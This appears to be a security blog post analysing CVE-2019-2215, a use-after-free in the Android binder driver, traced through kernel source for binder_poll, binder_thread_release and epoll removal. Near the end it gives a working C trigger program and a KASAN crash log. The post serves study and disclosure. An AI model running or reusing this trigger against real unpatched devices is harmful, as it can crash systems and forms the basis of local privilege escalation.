CVE-2019-2215 Review

Intro

This vulnerability is a use-after-free (UAF) in the Android binder driver that arises from the interaction between epoll_ctl and ioctl.

Vulnerability

First, let's look at binder's file_operations.

- drivers/android/binder.c

static const struct file_operations binder_fops = {

.owner = THIS_MODULE,

.poll = binder_poll,

.unlocked_ioctl = binder_ioctl,

.compat_ioctl = binder_ioctl,

.mmap = binder_mmap,

.open = binder_open,

.flush = binder_flush,

.release = binder_release,

};

The poll field is set to binder_poll(), and the unlocked_ioctl field is set to binder_ioctl().

In other words, registering a /dev/binder descriptor with epoll_ctl() ends up calling binder_poll(), and issuing ioctl() on it calls binder_ioctl().

Let's start with binder_poll().

- drivers/android/binder.c

static unsigned int binder_poll(struct file *filp,

struct poll_table_struct *wait)

{

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread = NULL;

bool wait_for_proc_work;

thread = binder_get_thread(proc);

if (!thread)

return POLLERR;

binder_inner_proc_lock(thread->proc);

thread->looper |= BINDER_LOOPER_STATE_POLL;

wait_for_proc_work = binder_available_for_proc_work_ilocked(thread);

binder_inner_proc_unlock(thread->proc);

poll_wait(filp, &thread->wait, wait);

if (binder_has_work(thread, wait_for_proc_work))

return POLLIN;

return 0;

}

/* ... */

static struct binder_thread *binder_get_thread(struct binder_proc *proc)

{

struct binder_thread *thread;

struct binder_thread *new_thread;

binder_inner_proc_lock(proc);

thread = binder_get_thread_ilocked(proc, NULL);

binder_inner_proc_unlock(proc);

if (!thread) {

new_thread = kzalloc(sizeof(*thread), GFP_KERNEL);

if (new_thread == NULL)

return NULL;

binder_inner_proc_lock(proc);

thread = binder_get_thread_ilocked(proc, new_thread);

binder_inner_proc_unlock(proc);

if (thread != new_thread)

kfree(new_thread);

}

return thread;

}

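binder_poll() calls binder_get_thread(). If binder_get_thread_ilocked() finds no existing binder_thread for the caller, binder_get_thread() allocates a struct binder_thread on the kernel heap with kzalloc().

Next, let's look at binder_ioctl(), which is reached through the ioctl system call.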

- drivers/android/binder.c

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)

{

int ret;

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread;

unsigned int size = _IOC_SIZE(cmd);

void __user *ubuf = (void __user *)arg;

/*pr_info("binder_ioctl: %d:%d %x %lx\n",

proc->pid, current->pid, cmd, arg);*/

binder_selftest_alloc(&proc->alloc);

trace_binder_ioctl(cmd, arg);

ret = wait_event_interruptible(binder_user_error_wait, binder_stop_on_user_error < 2);

if (ret)

goto err_unlocked;

thread = binder_get_thread(proc);

if (thread == NULL) {

ret = -ENOMEM;

goto err;

}

switch (cmd) {

case BINDER_WRITE_READ:

ret = binder_ioctl_write_read(filp, cmd, arg, thread);

if (ret)

goto err;

break;

case BINDER_SET_MAX_THREADS: {

int max_threads;

if (copy_from_user(&max_threads, ubuf,

sizeof(max_threads))) {

ret = -EINVAL;

goto err;

}

binder_inner_proc_lock(proc);

proc->max_threads = max_threads;

binder_inner_proc_unlock(proc);

break;

}

case BINDER_SET_CONTEXT_MGR_EXT: {

struct flat_binder_object fbo;

if (copy_from_user(&fbo, ubuf, sizeof(fbo))) {

ret = -EINVAL;

goto err;

}

ret = binder_ioctl_set_ctx_mgr(filp, &fbo);

if (ret)

goto err;

break;

}

case BINDER_SET_CONTEXT_MGR:

ret = binder_ioctl_set_ctx_mgr(filp, NULL);

if (ret)

goto err;

break;

case BINDER_THREAD_EXIT:

binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",

proc->pid, thread->pid);

binder_thread_release(proc, thread);

thread = NULL;

break;

case BINDER_VERSION: {

struct binder_version __user *ver = ubuf;

if (size != sizeof(struct binder_version)) {

ret = -EINVAL;

goto err;

}

if (put_user(BINDER_CURRENT_PROTOCOL_VERSION,

&ver->protocol_version)) {

ret = -EINVAL;

goto err;

}

break;

}

case BINDER_GET_NODE_INFO_FOR_REF: {

struct binder_node_info_for_ref info;

if (copy_from_user(&info, ubuf, sizeof(info))) {

ret = -EFAULT;

goto err;

}

ret = binder_ioctl_get_node_info_for_ref(proc, &info);

if (ret < 0)

goto err;

if (copy_to_user(ubuf, &info, sizeof(info))) {

ret = -EFAULT;

goto err;

}

break;

}

case BINDER_GET_NODE_DEBUG_INFO: {

struct binder_node_debug_info info;

if (copy_from_user(&info, ubuf, sizeof(info))) {

ret = -EFAULT;

goto err;

}

ret = binder_ioctl_get_node_debug_info(proc, &info);

if (ret < 0)

goto err;

if (copy_to_user(ubuf, &info, sizeof(info))) {

ret = -EFAULT;

goto err;

}

break;

}

default:

ret = -EINVAL;

goto err;

}

ret = 0;

err:

if (thread)

thread->looper_need_return = false;

wait_event_interruptible(binder_user_error_wait, binder_stop_on_user_error < 2);

if (ret && ret != -ERESTARTSYS)

pr_info("%d:%d ioctl %x %lx returned %d\n", proc->pid, current->pid, cmd, arg, ret);

err_unlocked:

trace_binder_ioctl_done(ret);

return ret;

}

The part we care about here is the handling of the BINDER_THREAD_EXIT command.

For BINDER_THREAD_EXIT, binder_ioctl() calls binder_thread_release().

- drivers/android/binder.c

static int binder_thread_release(struct binder_proc *proc,

struct binder_thread *thread)

{

struct binder_transaction *t;

struct binder_transaction *send_reply = NULL;

int active_transactions = 0;

struct binder_transaction *last_t = NULL;

binder_inner_proc_lock(thread->proc);

/*

* take a ref on the proc so it survives

* after we remove this thread from proc->threads.

* The corresponding dec is when we actually

* free the thread in binder_free_thread()

*/

proc->tmp_ref++;

/*

* take a ref on this thread to ensure it

* survives while we are releasing it

*/

atomic_inc(&thread->tmp_ref);

rb_erase(&thread->rb_node, &proc->threads);

t = thread->transaction_stack;

if (t) {

spin_lock(&t->lock);

if (t->to_thread == thread)

send_reply = t;

}

thread->is_dead = true;

while (t) {

last_t = t;

active_transactions++;

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"release %d:%d transaction %d %s, still active\n",

proc->pid, thread->pid,

t->debug_id,

(t->to_thread == thread) ? "in" : "out");

if (t->to_thread == thread) {

t->to_proc = NULL;

t->to_thread = NULL;

if (t->buffer) {

t->buffer->transaction = NULL;

t->buffer = NULL;

}

t = t->to_parent;

} else if (t->from == thread) {

t->from = NULL;

t = t->from_parent;

} else

BUG();

spin_unlock(&last_t->lock);

if (t)

spin_lock(&t->lock);

}

/*

* If this thread used poll, make sure we remove the waitqueue

* from any epoll data structures holding it with POLLFREE.

* waitqueue_active() is safe to use here because we're holding

* the inner lock.

*/

/*

if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&

waitqueue_active(&thread->wait)) {

wake_up_poll(&thread->wait, POLLHUP | POLLFREE);

}

*/

binder_inner_proc_unlock(thread->proc);

/*

* This is needed to avoid races between wake_up_poll() above and

* and ep_remove_waitqueue() called for other reasons (eg the epoll file

* descriptor being closed); ep_remove_waitqueue() holds an RCU read

* lock, so we can be sure it's done after calling synchronize_rcu().

*/

/*

if (thread->looper & BINDER_LOOPER_STATE_POLL)

synchronize_rcu();

*/

if (send_reply)

binder_send_failed_reply(send_reply, BR_DEAD_REPLY);

binder_release_work(proc, &thread->todo);

binder_thread_dec_tmpref(thread);

return active_transactions;

}

/* ... */

/**

* binder_thread_dec_tmpref() - decrement thread->tmp_ref

* @thread: thread to decrement

*

* A thread needs to be kept alive while being used to create or

* handle a transaction. binder_get_txn_from() is used to safely

* extract t->from from a binder_transaction and keep the thread

* indicated by t->from from being freed. When done with that

* binder_thread, this function is called to decrement the

* tmp_ref and free if appropriate (thread has been released

* and no transaction being processed by the driver)

*/

static void binder_thread_dec_tmpref(struct binder_thread *thread)

{

/*

* atomic is used to protect the counter value while

* it cannot reach zero or thread->is_dead is false

*/

binder_inner_proc_lock(thread->proc);

atomic_dec(&thread->tmp_ref);

if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {

binder_inner_proc_unlock(thread->proc);

binder_free_thread(thread);

return;

}

binder_inner_proc_unlock(thread->proc);

}

/* ... */

static void binder_free_thread(struct binder_thread *thread)

{

BUG_ON(!list_empty(&thread->todo));

binder_stats_deleted(BINDER_STAT_THREAD);

binder_proc_dec_tmpref(thread->proc);

put_task_struct(thread->task);

kfree(thread);

}

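binder_thread_release() cleans up several fields of thread and then calls binder_thread_dec_tmpref(). Once the thread is marked dead and tmp_ref has dropped to zero, binder_thread_dec_tmpref() calls binder_free_thread(), which frees the allocated thread with kfree().

But something is odd here.

When handling BINDER_THREAD_EXIT, the driver frees the allocated thread through binder_thread_release(), but afterwards it only sets the local thread variable to NULL and does nothing else. Is it really true that no other reference to thread needs to be cleaned up?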

Let's look again at where else binder_thread gets registered.

First, back to binder_poll().

static unsigned int binder_poll(struct file *filp,

struct poll_table_struct *wait)

{

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread = NULL;

bool wait_for_proc_work;

thread = binder_get_thread(proc);

if (!thread)

return POLLERR;

binder_inner_proc_lock(thread->proc);

thread->looper |= BINDER_LOOPER_STATE_POLL;

wait_for_proc_work = binder_available_for_proc_work_ilocked(thread);

binder_inner_proc_unlock(thread->proc);

poll_wait(filp, &thread->wait, wait);

if (binder_has_work(thread, wait_for_proc_work))

return POLLIN;

return 0;

}

It obtains thread through binder_get_thread() and then passes &thread->wait to poll_wait().

Now let's look at poll_wait(), which binder_poll() calls right after binder_get_thread().

- include/linux/poll.h

static inline void poll_wait(struct file * filp, wait_queue_head_t * wait_address, poll_table *p)

{

if (p && p->_qproc && wait_address)

p->_qproc(filp, wait_address, p);

}

binder_poll() passes &thread->wait as wait_address and forwards its own wait argument as p; poll_wait() then calls the _qproc callback stored in p.

That wait argument is the poll_table handed to binder_poll() by its caller. To see where it comes from, let's analyze sys_epoll_ctl.

- fs/eventpoll.c

SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,

struct epoll_event __user *, event)

{

int error;

int full_check = 0;

struct fd f, tf;

struct eventpoll *ep;

struct epitem *epi;

struct epoll_event epds;

struct eventpoll *tep = NULL;

error = -EFAULT;

if (ep_op_has_event(op) &&

copy_from_user(&epds, event, sizeof(struct epoll_event)))

goto error_return;

error = -EBADF;

f = fdget(epfd);

if (!f.file)

goto error_return;

/* Get the "struct file *" for the target file */

tf = fdget(fd);

if (!tf.file)

goto error_fput;

/* The target file descriptor must support poll */

error = -EPERM;

if (!tf.file->f_op->poll)

goto error_tgt_fput;

/* Check if EPOLLWAKEUP is allowed */

if (ep_op_has_event(op))

ep_take_care_of_epollwakeup(&epds);

/*

* We have to check that the file structure underneath the file descriptor

* the user passed to us _is_ an eventpoll file. And also we do not permit

* adding an epoll file descriptor inside itself.

*/

error = -EINVAL;

if (f.file == tf.file || !is_file_epoll(f.file))

goto error_tgt_fput;

/*

* epoll adds to the wakeup queue at EPOLL_CTL_ADD time only,

* so EPOLLEXCLUSIVE is not allowed for a EPOLL_CTL_MOD operation.

* Also, we do not currently supported nested exclusive wakeups.

*/

if (ep_op_has_event(op) && (epds.events & EPOLLEXCLUSIVE)) {

if (op == EPOLL_CTL_MOD)

goto error_tgt_fput;

if (op == EPOLL_CTL_ADD && (is_file_epoll(tf.file) ||

(epds.events & ~EPOLLEXCLUSIVE_OK_BITS)))

goto error_tgt_fput;

}

/*

* At this point it is safe to assume that the "private_data" contains

* our own data structure.

*/

ep = f.file->private_data;

/*

* When we insert an epoll file descriptor, inside another epoll file

* descriptor, there is the change of creating closed loops, which are

* better be handled here, than in more critical paths. While we are

* checking for loops we also determine the list of files reachable

* and hang them on the tfile_check_list, so we can check that we

* haven't created too many possible wakeup paths.

*

* We do not need to take the global 'epumutex' on EPOLL_CTL_ADD when

* the epoll file descriptor is attaching directly to a wakeup source,

* unless the epoll file descriptor is nested. The purpose of taking the

* 'epmutex' on add is to prevent complex toplogies such as loops and

* deep wakeup paths from forming in parallel through multiple

* EPOLL_CTL_ADD operations.

*/

mutex_lock_nested(&ep->mtx, 0);

if (op == EPOLL_CTL_ADD) {

if (!list_empty(&f.file->f_ep_links) ||

is_file_epoll(tf.file)) {

full_check = 1;

mutex_unlock(&ep->mtx);

mutex_lock(&epmutex);

if (is_file_epoll(tf.file)) {

error = -ELOOP;

if (ep_loop_check(ep, tf.file) != 0) {

clear_tfile_check_list();

goto error_tgt_fput;

}

} else

list_add(&tf.file->f_tfile_llink,

&tfile_check_list);

mutex_lock_nested(&ep->mtx, 0);

if (is_file_epoll(tf.file)) {

tep = tf.file->private_data;

mutex_lock_nested(&tep->mtx, 1);

}

}

}

/*

* Try to lookup the file inside our RB tree, Since we grabbed "mtx"

* above, we can be sure to be able to use the item looked up by

* ep_find() till we release the mutex.

*/

epi = ep_find(ep, tf.file, fd);

error = -EINVAL;

switch (op) {

case EPOLL_CTL_ADD:

if (!epi) {

epds.events |= POLLERR | POLLHUP;

error = ep_insert(ep, &epds, tf.file, fd, full_check);

} else

error = -EEXIST;

if (full_check)

clear_tfile_check_list();

break;

case EPOLL_CTL_DEL:

if (epi)

error = ep_remove(ep, epi);

else

error = -ENOENT;

break;

case EPOLL_CTL_MOD:

if (epi) {

if (!(epi->event.events & EPOLLEXCLUSIVE)) {

epds.events |= POLLERR | POLLHUP;

error = ep_modify(ep, epi, &epds);

}

} else

error = -ENOENT;

break;

}

if (tep != NULL)

mutex_unlock(&tep->mtx);

mutex_unlock(&ep->mtx);

error_tgt_fput:

if (full_check)

mutex_unlock(&epmutex);

fdput(tf);

error_fput:

fdput(f);

error_return:

return error;

}

sys_epoll_ctl performs a series of checks and then handles the request according to op. The case we care about is EPOLL_CTL_ADD.

EPOLL_CTL_ADD calls ep_insert().

- fs/eventpoll.c

static int ep_insert(struct eventpoll *ep, struct epoll_event *event,

struct file *tfile, int fd, int full_check)

{

int error, revents, pwake = 0;

unsigned long flags;

long user_watches;

struct epitem *epi;

struct ep_pqueue epq;

user_watches = atomic_long_read(&ep->user->epoll_watches);

if (unlikely(user_watches >= max_user_watches))

return -ENOSPC;

if (!(epi = kmem_cache_alloc(epi_cache, GFP_KERNEL)))

return -ENOMEM;

/* Item initialization follow here ... */

INIT_LIST_HEAD(&epi->rdllink);

INIT_LIST_HEAD(&epi->fllink);

INIT_LIST_HEAD(&epi->pwqlist);

epi->ep = ep;

ep_set_ffd(&epi->ffd, tfile, fd);

epi->event = *event;

epi->nwait = 0;

epi->next = EP_UNACTIVE_PTR;

if (epi->event.events & EPOLLWAKEUP) {

error = ep_create_wakeup_source(epi);

if (error)

goto error_create_wakeup_source;

} else {

RCU_INIT_POINTER(epi->ws, NULL);

}

/* Initialize the poll table using the queue callback */

epq.epi = epi;

init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);

/*

* Attach the item to the poll hooks and get current event bits.

* We can safely use the file* here because its usage count has

* been increased by the caller of this function. Note that after

* this operation completes, the poll callback can start hitting

* the new item.

*/

revents = ep_item_poll(epi, &epq.pt);

/*

* We have to check if something went wrong during the poll wait queue

* install process. Namely an allocation for a wait queue failed due

* high memory pressure.

*/

error = -ENOMEM;

if (epi->nwait < 0)

goto error_unregister;

/* Add the current item to the list of active epoll hook for this file */

spin_lock(&tfile->f_lock);

list_add_tail_rcu(&epi->fllink, &tfile->f_ep_links);

spin_unlock(&tfile->f_lock);

/*

* Add the current item to the RB tree. All RB tree operations are

* protected by "mtx", and ep_insert() is called with "mtx" held.

*/

ep_rbtree_insert(ep, epi);

/* now check if we've created too many backpaths */

error = -EINVAL;

if (full_check && reverse_path_check())

goto error_remove_epi;

/* We have to drop the new item inside our item list to keep track of it */

spin_lock_irqsave(&ep->lock, flags);

/* record NAPI ID of new item if present */

ep_set_busy_poll_napi_id(epi);

/* If the file is already "ready" we drop it inside the ready list */

if ((revents & event->events) && !ep_is_linked(&epi->rdllink)) {

list_add_tail(&epi->rdllink, &ep->rdllist);

ep_pm_stay_awake(epi);

/* Notify waiting tasks that events are available */

if (waitqueue_active(&ep->wq))

wake_up_locked(&ep->wq);

if (waitqueue_active(&ep->poll_wait))

pwake++;

}

spin_unlock_irqrestore(&ep->lock, flags);

atomic_long_inc(&ep->user->epoll_watches);

/* We have to call this outside the lock */

if (pwake)

ep_poll_safewake(&ep->poll_wait);

return 0;

error_remove_epi:

spin_lock(&tfile->f_lock);

list_del_rcu(&epi->fllink);

spin_unlock(&tfile->f_lock);

rb_erase_cached(&epi->rbn, &ep->rbr);

error_unregister:

ep_unregister_pollwait(ep, epi);

/*

* We need to do this because an event could have been arrived on some

* allocated wait queue. Note that we don't care about the ep->ovflist

* list, since that is used/cleaned only inside a section bound by "mtx".

* And ep_insert() is called with "mtx" held.

*/

spin_lock_irqsave(&ep->lock, flags);

if (ep_is_linked(&epi->rdllink))

list_del_init(&epi->rdllink);

spin_unlock_irqrestore(&ep->lock, flags);

wakeup_source_unregister(ep_wakeup_source(epi));

error_create_wakeup_source:

kmem_cache_free(epi_cache, epi);

return error;

}

Here we focus only on init_poll_funcptr() and ep_item_poll().

- include/linux/poll.h

static inline void init_poll_funcptr(poll_table *pt, poll_queue_proc qproc)

{

pt->_qproc = qproc;

pt->_key = ~0UL; /* all events enabled */

}

- fs/eventpoll.c

static inline unsigned int ep_item_poll(struct epitem *epi, poll_table *pt)

{

pt->_key = epi->event.events;

return epi->ffd.file->f_op->poll(epi->ffd.file, pt) & epi->event.events;

}

init_poll_funcptr() sets epq.pt._qproc to ep_ptable_queue_proc(), and ep_item_poll() then calls epi->ffd.file->f_op->poll().

Here f_op is the file_operations of /dev/binder (binder_fops), so the function actually called is binder_poll(). Its second argument is &epq.pt, the poll_table whose _qproc was just set to ep_ptable_queue_proc().

Now return to poll_wait(), which binder_poll() calls.

static inline void poll_wait(struct file * filp, wait_queue_head_t * wait_address, poll_table *p)

{

if (p && p->_qproc && wait_address)

p->_qproc(filp, wait_address, p);

}

So the p->_qproc() invoked here is ep_ptable_queue_proc().

Let's see what exactly ep_ptable_queue_proc() does.

/*

* This is the callback that is used to add our wait queue to the

* target file wakeup lists.

*/

static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,

poll_table *pt)

{

struct epitem *epi = ep_item_from_epqueue(pt);

struct eppoll_entry *pwq;

if (epi->nwait >= 0 && (pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL))) {

init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);

pwq->whead = whead;

pwq->base = epi;

if (epi->event.events & EPOLLEXCLUSIVE)

add_wait_queue_exclusive(whead, &pwq->wait);

else

add_wait_queue(whead, &pwq->wait);

list_add_tail(&pwq->llink, &epi->pwqlist);

epi->nwait++;

} else {

/* We have to signal that an error occurred */

epi->nwait = -1;

}

}

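It allocates and initializes pwq, then adds it to the pwqlist of epi, the struct epitem obtained through ep_item_from_epqueue().

The whead field of pwq (a struct eppoll_entry) is set to the whead argument, which is the address of the wait field of binder_thread.

add_wait_queue() (or add_wait_queue_exclusive() when EPOLLEXCLUSIVE is set) then links pwq->wait into the wait queue headed by whead, that is, binder_thread->wait.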



이를 간단히 그림으로 나타내면 다음과 같다.

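binder_thread_release() frees the binder_thread but does not clean up any of the pointers above: in the listing shown earlier, the block that would call wake_up_poll(&thread->wait, POLLHUP | POLLFREE) is commented out. So a dangling pointer definitely exists!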

So how can this dangling pointer be reached?

Besides EPOLL_CTL_ADD, epoll_ctl() also supports the EPOLL_CTL_DEL command, which calls ep_remove().

case EPOLL_CTL_DEL:

if (epi)

error = ep_remove(ep, epi);

else

error = -ENOENT;

break;

Let's look at ep_remove().

- fs/eventpoll.c

/*

* Removes a "struct epitem" from the eventpoll RB tree and deallocates

* all the associated resources. Must be called with "mtx" held.

*/

static int ep_remove(struct eventpoll *ep, struct epitem *epi)

{

unsigned long flags;

struct file *file = epi->ffd.file;

/*

* Removes poll wait queue hooks. We _have_ to do this without holding

* the "ep->lock" otherwise a deadlock might occur. This because of the

* sequence of the lock acquisition. Here we do "ep->lock" then the wait

* queue head lock when unregistering the wait queue. The wakeup callback

* will run by holding the wait queue head lock and will call our callback

* that will try to get "ep->lock".

*/

ep_unregister_pollwait(ep, epi);

/* Remove the current item from the list of epoll hooks */

spin_lock(&file->f_lock);

list_del_rcu(&epi->fllink);

spin_unlock(&file->f_lock);

rb_erase_cached(&epi->rbn, &ep->rbr);

spin_lock_irqsave(&ep->lock, flags);

if (ep_is_linked(&epi->rdllink))

list_del_init(&epi->rdllink);

spin_unlock_irqrestore(&ep->lock, flags);

wakeup_source_unregister(ep_wakeup_source(epi));

/*

* At this point it is safe to free the eventpoll item. Use the union

* field epi->rcu, since we are trying to minimize the size of

* 'struct epitem'. The 'rbn' field is no longer in use. Protected by

* ep->mtx. The rcu read side, reverse_path_check_proc(), does not make

* use of the rbn field.

*/

call_rcu(&epi->rcu, epi_rcu_free);

atomic_long_dec(&ep->user->epoll_watches);

return 0;

}

ep_remove() calls ep_unregister_pollwait(), passing epi (a struct epitem) as an argument.

- fs/eventpoll.c

/*

* This function unregisters poll callbacks from the associated file

* descriptor. Must be called with "mtx" held (or "epmutex" if called from

* ep_free).

*/

static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)

{

struct list_head *lsthead = &epi->pwqlist;

struct eppoll_entry *pwq;

while (!list_empty(lsthead)) {

pwq = list_first_entry(lsthead, struct eppoll_entry, llink);

list_del(&pwq->llink);

ep_remove_wait_queue(pwq);

kmem_cache_free(pwq_cache, pwq);

}

}

ep_unregister_pollwait() takes each pwq from the list with list_first_entry() and passes it to ep_remove_wait_queue().

- fs/eventpoll.c

static void ep_remove_wait_queue(struct eppoll_entry *pwq)

{

wait_queue_head_t *whead;

rcu_read_lock();

/*

* If it is cleared by POLLFREE, it should be rcu-safe.

* If we read NULL we need a barrier paired with

* smp_store_release() in ep_poll_callback(), otherwise

* we rely on whead->lock.

*/

whead = smp_load_acquire(&pwq->whead);

if (whead)

remove_wait_queue(whead, &pwq->wait);

rcu_read_unlock();

}

ep_remove_wait_queue() calls remove_wait_queue() with pwq->whead and &pwq->wait as arguments.

If the descriptor was previously added to epoll with EPOLL_CTL_ADD on binder, whead is the address of the wait field of binder_thread.

- kernel/sched/wait.c

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

unsigned long flags;

spin_lock_irqsave(&wq_head->lock, flags);

__remove_wait_queue(wq_head, wq_entry);

spin_unlock_irqrestore(&wq_head->lock, flags);

}

EXPORT_SYMBOL(remove_wait_queue);

- include/linux/wait.h

static inline void

__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

list_del(&wq_entry->entry);

}

remove_wait_queue() takes the spinlock inside wq_head and then, through __remove_wait_queue(), unlinks the entry with list_del().

So if BINDER_THREAD_EXIT is sent to binder via ioctl to free the binder_thread before EPOLL_CTL_DEL is requested via epoll_ctl, the kernel accesses the freed chunk through the dangling pointer, and the UAF is triggered!

Let's actually trigger it.

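#include <fcntl.h>
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>

#define BINDER_THREAD_EXIT 0x40046208

int main(void) {
    int fd, epfd;
    struct epoll_event event = {.events = EPOLLIN};

    fd = open("/dev/binder", O_RDONLY);
    epfd = epoll_create(1000);
    if (fd < 0 || epfd < 0) {
        perror("open/epoll_create");
        return 1;
    }

    /* EPOLL_CTL_ADD -> binder_poll(): allocates binder_thread, links thread->wait */
    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
    /* BINDER_THREAD_EXIT -> binder_thread_release(): frees binder_thread */
    ioctl(fd, BINDER_THREAD_EXIT, NULL);
    /* EPOLL_CTL_DEL -> remove_wait_queue(): touches the freed wait queue head */
    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);

    return 0;
}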

First, epoll_create() creates an epoll fd. Then epoll_ctl() with EPOLL_CTL_ADD creates the binder_thread, and ioctl with BINDER_THREAD_EXIT frees it, leaving a dangling chunk. Finally, epoll_ctl() with EPOLL_CTL_DEL accesses the dangling chunk.

I compiled this code and ran it on a kernel built with KASAN.

[ 189.587536] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x2e/0x52

[ 189.589467] Write of size 4 at addr ffff888052d465c8 by task exploit/6603

[ 189.591403]

[ 189.591886] CPU: 0 PID: 6603 Comm: exploit Tainted: G W 4.14.150+ #2

[ 189.592314] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014

[ 189.592314] Call Trace:

[ 189.592314] dump_stack+0x93/0xcd

[ 189.592314] print_address_description+0x6f/0x233

[ 189.592314] ? _raw_spin_lock_irqsave+0x2e/0x52

[ 189.592314] __kasan_report+0x138/0x17e

[ 189.592314] ? _raw_spin_lock_irqsave+0x2e/0x52

[ 189.592314] kasan_report+0x16/0x1b

[ 189.592314] check_memory_region+0x12f/0x135

[ 189.592314] kasan_check_write+0x18/0x1a

[ 189.592314] _raw_spin_lock_irqsave+0x2e/0x52

[ 189.592314] remove_wait_queue+0x1c/0xd8

[ 189.592314] ep_unregister_pollwait.constprop.0+0x11b/0x14b

[ 189.592314] ep_remove+0x45/0x1d9

[ 189.592314] SyS_epoll_ctl+0x152f/0x1840

[ 189.592314] ? ioctl_preallocate+0x1a7/0x1a7

[ 189.592314] ? SyS_epoll_create+0x3a/0x3a

[ 189.592314] ? security_file_ioctl+0x67/0xa4

[ 189.592314] ? prepare_exit_to_usermode+0x22d/0x239

[ 189.592314] do_syscall_64+0x1d4/0x216

[ 189.592314] ? prepare_exit_to_usermode+0x22d/0x239

[ 189.592314] ? SyS_epoll_create+0x3a/0x3a

[ 189.592314] entry_SYSCALL_64_after_hwframe+0x3d/0xa2

[ 189.592314] RIP: 0033:0x23616a

[ 189.592314] RSP: 002b:00007ffdc7afaf88 EFLAGS: 00000206 ORIG_RAX: 00000000000000e9

[ 189.592314] RAX: ffffffffffffffda RBX: 00000000002adfb8 RCX: 000000000023616a

[ 189.592314] RDX: 0000000000000003 RSI: 0000000000000002 RDI: 0000000000000004

[ 189.592314] RBP: 00007ffdc7afafb0 R08: 0000000000204543 R09: 0000000000000000

[ 189.592314] R10: 00007ffdc7afaf98 R11: 0000000000000206 R12: 0000000000000001

[ 189.592314] R13: 00007ffdc7afb0a8 R14: 0000000000222160 R15: 00007ffdc7afb080

[ 189.592314]

[ 189.592314] Allocated by task 6603:

[ 189.592314] save_stack_trace+0x1a/0x1c

[ 189.592314] save_stack+0x44/0xab

[ 189.592314] __kasan_kmalloc.constprop.0+0x8f/0xa1

[ 189.592314] kasan_kmalloc+0xd/0xf

[ 189.592314] __kmalloc+0x170/0x199

[ 189.592314] kzalloc.constprop.0+0x1c/0x1e

[ 189.592314] binder_get_thread+0x15e/0x63f

[ 189.592314] binder_poll+0x51/0x1cb

[ 189.592314] ep_item_poll+0xd7/0x10e

[ 189.592314] SyS_epoll_ctl+0xd4a/0x1840

[ 189.592314] do_syscall_64+0x1d4/0x216

[ 189.592314] entry_SYSCALL_64_after_hwframe+0x3d/0xa2

[ 189.592314] 0xffffffffffffffff

[ 189.592314]

[ 189.592314] Freed by task 6603:

[ 189.592314] save_stack_trace+0x1a/0x1c

[ 189.592314] save_stack+0x44/0xab

[ 189.592314] __kasan_slab_free+0x10b/0x12f

[ 189.592314] kasan_slab_free+0x12/0x14

[ 189.592314] slab_free_freelist_hook+0xb9/0x105

[ 189.592314] kfree+0x102/0x196

[ 189.592314] binder_thread_dec_tmpref+0x1b0/0x1ee

[ 189.592314] binder_thread_release+0x3dd/0x3ef

[ 189.592314] binder_ioctl+0x4df1/0x56a0

[ 189.592314] vfs_ioctl+0x82/0x9d

[ 189.592314] do_vfs_ioctl+0xc69/0xcc7

[ 189.592314] SyS_ioctl+0x6c/0xa7

[ 189.592314] do_syscall_64+0x1d4/0x216

[ 189.592314] entry_SYSCALL_64_after_hwframe+0x3d/0xa2

[ 189.592314] 0xffffffffffffffff

[ 189.592314]

[ 189.592314] The buggy address belongs to the object at ffff888052d46528

[ 189.592314] which belongs to the cache kmalloc-512 of size 512

[ 189.592314] The buggy address is located 160 bytes inside of

[ 189.592314] 512-byte region [ffff888052d46528, ffff888052d46728)

[ 189.592314] The buggy address belongs to the page:

[ 189.592314] page:ffffea00014b5100 count:1 mapcount:0 mapping: (null) index:0xffff888052d47608 compound_mapcount: 0

[ 189.592314] flags: 0x4000000000010200(slab|head)

[ 189.592314] raw: 4000000000010200 0000000000000000 ffff888052d47608 000000010012000f

[ 189.592314] raw: ffffea0001004f20 ffff88805a401650 ffff88805a40cf40 0000000000000000

[ 189.592314] page dumped because: kasan: bad access detected

[ 189.592314]

[ 189.592314] Memory state around the buggy address:

[ 189.592314] ffff888052d46480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

[ 189.592314] ffff888052d46500: fc fc fc fc fc fb fb fb fb fb fb fb fb fb fb fb

[ 189.592314] >ffff888052d46580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

[ 189.592314] ^

[ 189.592314] ffff888052d46600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

[ 189.592314] ffff888052d46680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

[ 189.592314] ==================================================================

[ 189.592314] Disabling lock debugging due to kernel taint

As shown, a use-after-free is detected, and the call trace shows that it was triggered from epoll_ctl.

Conclusion

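Android exploitation turned out to be just as structurally complex as Linux kernel exploitation in general. The exploitation approach also seems to differ somewhat from that of a typical Linux kernel bug.

In the next post, I plan to write an actual exploit.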